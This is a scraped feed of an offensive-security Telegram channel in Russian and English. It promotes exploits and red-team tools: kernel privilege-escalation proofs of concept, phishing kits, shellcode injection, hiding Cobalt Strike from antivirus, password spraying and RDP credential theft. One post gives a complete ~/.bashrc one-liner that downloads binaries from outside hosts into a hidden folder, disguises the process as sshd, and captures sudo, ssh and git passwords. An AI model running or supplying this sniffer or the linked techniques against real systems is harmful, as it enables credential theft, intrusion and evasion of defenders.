Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-1086 Linux kernel LPE
Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
A full write-up of the exploit - including background information and loads of useful diagrams - can be found in the Flipping Pages blogpost.
Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
A full write-up of the exploit - including background information and loads of useful diagrams - can be found in the Flipping Pages blogpost.
👍12🔥5❤2
Evilginx ❤️ Gophish
The highly anticipated official integration between Evilginx and Gophish has been unveiled in the latest Evilginx 3.3 update. Alongside this major feature, the update brings numerous quality-of-life enhancements.
🔗 https://breakdev.org/evilginx-3-3-go-phish/
#evilginx #gophish #phishing
The highly anticipated official integration between Evilginx and Gophish has been unveiled in the latest Evilginx 3.3 update. Alongside this major feature, the update brings numerous quality-of-life enhancements.
🔗 https://breakdev.org/evilginx-3-3-go-phish/
#evilginx #gophish #phishing
🔥15❤🔥6👍5
Forwarded from 1N73LL1G3NC3
CVE-2024-21338
LPE from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.
Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/
LPE from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.
Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/
👍13🔥5
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Ой, красота))) Получить данные из LSA без дампа LSASS.
Tool: https://github.com/EvanMcBroom/lsa-whisperer
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
Tool: https://github.com/EvanMcBroom/lsa-whisperer
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
GitHub
GitHub - EvanMcBroom/lsa-whisperer: Tools for interacting with authentication packages using their individual message protocols
Tools for interacting with authentication packages using their individual message protocols - EvanMcBroom/lsa-whisperer
👍14🔥2
Forwarded from Offensive Xwitter
😈 [ The Hacker's Choice (@[email protected]) @hackerschoice ]
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
🔥8❤🔥2
🏆 Pentest Award: Ежегодная независимая премия для пентестеров
Команда Awillix объявила о начале приема заявок на ежегодную премию — Pentest Award.
Это отличная возможность выразить свои достижения и продемонстрировать вклад в ИБ сообщество, а также поделиться лучшими практическими историями.
В этот раз будет 6 номинаций, по три призовых места в каждой:
— Пробив WEB;
— Пробив инфраструктуры;
— Девайс;
— Hack the logic;
— Раз bypass, два bypass;
— Ловись рыбка.
Главный приз — тяжеленная стеклянная именная статуэтка, которую, к слову, в прошлом году выиграл мой дорогой snovvcrash за первое место.
И, конечно, не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также другие бесценные подарки от BI.ZONE Bug Bounty и VK Bug Bounty.
#pentestaward
Команда Awillix объявила о начале приема заявок на ежегодную премию — Pentest Award.
Это отличная возможность выразить свои достижения и продемонстрировать вклад в ИБ сообщество, а также поделиться лучшими практическими историями.
В этот раз будет 6 номинаций, по три призовых места в каждой:
— Пробив WEB;
— Пробив инфраструктуры;
— Девайс;
— Hack the logic;
— Раз bypass, два bypass;
— Ловись рыбка.
Главный приз — тяжеленная стеклянная именная статуэтка, которую, к слову, в прошлом году выиграл мой дорогой snovvcrash за первое место.
И, конечно, не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также другие бесценные подарки от BI.ZONE Bug Bounty и VK Bug Bounty.
#pentestaward
❤🔥7🔥4❤1👍1
Forwarded from Похек (Сергей Зыбнев)
From Zero to Hero Phishing Company (ONSEC).pdf
1.1 MB
From Zero to Hero: Phishing company
#phishing #фишинг #перевод #от_подписчика
Эксклюзивно для канала Похек, @resource_not_found сделал перевод этой статьи на русский язык.
🙏 Спасибо большое ему и надеюсь она будет вам полезна)
🌚 @poxek
#phishing #фишинг #перевод #от_подписчика
Эксклюзивно для канала Похек, @resource_not_found сделал перевод этой статьи на русский язык.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16
Forwarded from Standoff Cyberbattle
Media is too big
VIEW IN TELEGRAM
Участник DreamTeam Acrono сделал предложение своей девушке 😍
Давайте поздравим ребят!
Давайте поздравим ребят!
❤🔥73❤25👍14👎6🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling VirtualProtect, VirtualAllocEx, VirtualAlloc.
🚀 Steps:
— Find the OneDrive.exe in running processes;
— Get the handle of OneDrive.exe;
— Query remote process memory information;
— look for RWX memory regions;
— Write shellcode into found region of OneDrive.exe;
— Fork OneDrive.exe into a new process;
— Set the forked process's start address to the cloned shellcode;
— Terminate the cloned process after execution.
🔗 https://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV
#winapi #onedrive #injection #maldev #cpp
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5
The article outlines methods to conceal Cobalt Strike from detection by antivirus and EDR systems, with a particular focus on bypassing Kaspersky Endpoint Security. Author introduces the HCS tool for obfuscating JARM signatures and offers detailed steps for modifying Cobalt Strike’s code and SSL certificates to enhance OPSEC.
🔗 https://blog.injectexp.dev/2024/02/27/hide-cobalt-strike-like-a-pro/
#cobaltstrike #customize #kaspersky #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍179🔥21❤3
Forwarded from 1N73LL1G3NC3
Pwning the Domain: AD CS (Active Directory Certificate Services)
Domain Escalation:
Domain Persistence:
Domain Certificate Theft:
Domain Escalation:
• ESC 1 (Template misconfiguration)
• ESC 2 (Template misconfiguration)
• ESC 3 (Template misconfiguration)
• ESC 4 (Access Controls Attacks)
• ESC 5 (Sufficient rights against several objects)
• ESC 6 (CA Configuration)
• ESC 7 (Sufficient rights against the CA)
• ESC8
• ESC9
• ESC10
• ESC11
• ESC12
• ESC13
Domain Persistence:
• DPERSIST1 (Forge certificates with stolen CA certificate)
• DPERSIST2
• DPERSIST3
Account Persistence:
• PERSIST1 (User Account)
• PERSIST2 (Machine account)
• PERSIST3
Domain Certificate Theft:
• THEFT1 (Export user certificates with Crypto APIs)
• THEFT2 (Certificate theft via DPAPI): User certificates THEFT, Machine certificates Theft
• THEFT3
• THEFT4
• THEFT5
🔥14❤2👍2
Fast and user friendly way to interact with SMB shares.
🔗https://github.com/p0dalirius/smbclient-ng
#smb #smbclient #share #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22👍6❤2
Forwarded from Offensive Xwitter
😈 [ V❄️ @vincenzosantuc1 ]
In-memory sleeping technique using threads created in suspended state and timers that work with the ResumeThread function in order to adapt SWAPPALA to the Reflective DLL context.
🔗 https://oldboy21.github.io/posts/2024/06/sleaping-issues-swappala-and-reflective-dll-friends-forever/
🐥 [ tweet ]
In-memory sleeping technique using threads created in suspended state and timers that work with the ResumeThread function in order to adapt SWAPPALA to the Reflective DLL context.
🔗 https://oldboy21.github.io/posts/2024/06/sleaping-issues-swappala-and-reflective-dll-friends-forever/
🐥 [ tweet ]
👍4❤🔥1
🔐 Spray Passwords, Avoid Lockouts
In this blog post, learn how to effectively use password spraying in Active Directory environments without triggering account lockouts. Dive into authentication mechanisms, password policies, GPO and PSOs.
Research
🔗 https://en.hackndo.com/password-spraying-lockout/
Tool
🔗 https://github.com/login-securite/conpass
#ad #spraying #passpol
In this blog post, learn how to effectively use password spraying in Active Directory environments without triggering account lockouts. Dive into authentication mechanisms, password policies, GPO and PSOs.
Research
🔗 https://en.hackndo.com/password-spraying-lockout/
Tool
🔗 https://github.com/login-securite/conpass
#ad #spraying #passpol
🔥11👍6❤2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-4577: PHP CGI Argument Injection (RCE)
PoC: https://github.com/watchtowrlabs/CVE-2024-4577
Blog: blog1 & blog2
#exploit #rce
on Windows
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
PoC: https://github.com/watchtowrlabs/CVE-2024-4577
Blog: blog1 & blog2
#exploit #rce
GitHub
GitHub - watchtowrlabs/CVE-2024-4577: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC - watchtowrlabs/CVE-2024-4577
🔥8👍3👎1
May 21st, Veeam published an advisory stating that all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 is affected by an authentication bypass allowing an unauthenticated attacker to bypass the authentication and log in to the Veeam Backup Enterprise Manager web interface as any user the CVSS for this vulnerability is 9.8.
🔗 Source:
https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
🔗 PoC:
https://github.com/sinsinology/CVE-2024-29849
#veeam #authentication #bypass #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-26229: Windows LPE
PATCHED: Apr 9, 2024
https://github.com/RalfHacker/CVE-2024-26229-exploit
P.S. Чуть поправил оригинальный эксплоит
#git #exploit #lpe #pentest #redteam
PATCHED: Apr 9, 2024
https://github.com/RalfHacker/CVE-2024-26229-exploit
P.S. Чуть поправил оригинальный эксплоит
#git #exploit #lpe #pentest #redteam
🔥7👍1
DLHell is a tool for performing local and remote DCOM Windows DLL proxying. It can intercept DLLs on remote objects to execute arbitrary commands. The tool supports various authentication methods and provides capabilities for local and remote DLL proxying, as well as DCOM DLL proxying.
🔗 Source:
https://github.com/synacktiv/DLHell
#windows #dll #proxing #dcom
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - synacktiv/DLHell: Local & remote Windows DLL Proxying
Local & remote Windows DLL Proxying. Contribute to synacktiv/DLHell development by creating an account on GitHub.
👍6❤3
"Assembly Unleashed: A Hacker's Handbook" is a definitive resource tailored specifically for hackers and security researchers seeking to master the art of assembly programming language. Authored by seasoned practitioners in the field, this book offers a comprehensive journey into the depths of assembly, unraveling its complexities and exposing its potential for exploitation and defense.
🔗 Source:
https://redteamrecipe.com/assembly-for-hackers
#asm #syscalls #dll #apc #injection #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
🔑 RdpStrike
The project aims to extract clear text passwords from mstsc.exe, and the shellcode uses Hardware Breakpoint to hook APIs. It is a complete positional independent code, and when the shellcode injects into the mstsc.exe process, it is going to put Hardware Breakpoint onto three different APIs, ultimately capturing any clear-text credentials and then saving them to a file.
🔗 Source:
https://github.com/0xEr3bus/RdpStrike
#rdp #creds #bof #cobaltstrike
The project aims to extract clear text passwords from mstsc.exe, and the shellcode uses Hardware Breakpoint to hook APIs. It is a complete positional independent code, and when the shellcode injects into the mstsc.exe process, it is going to put Hardware Breakpoint onto three different APIs, ultimately capturing any clear-text credentials and then saving them to a file.
🔗 Source:
https://github.com/0xEr3bus/RdpStrike
#rdp #creds #bof #cobaltstrike
👍9❤🔥7❤3👎2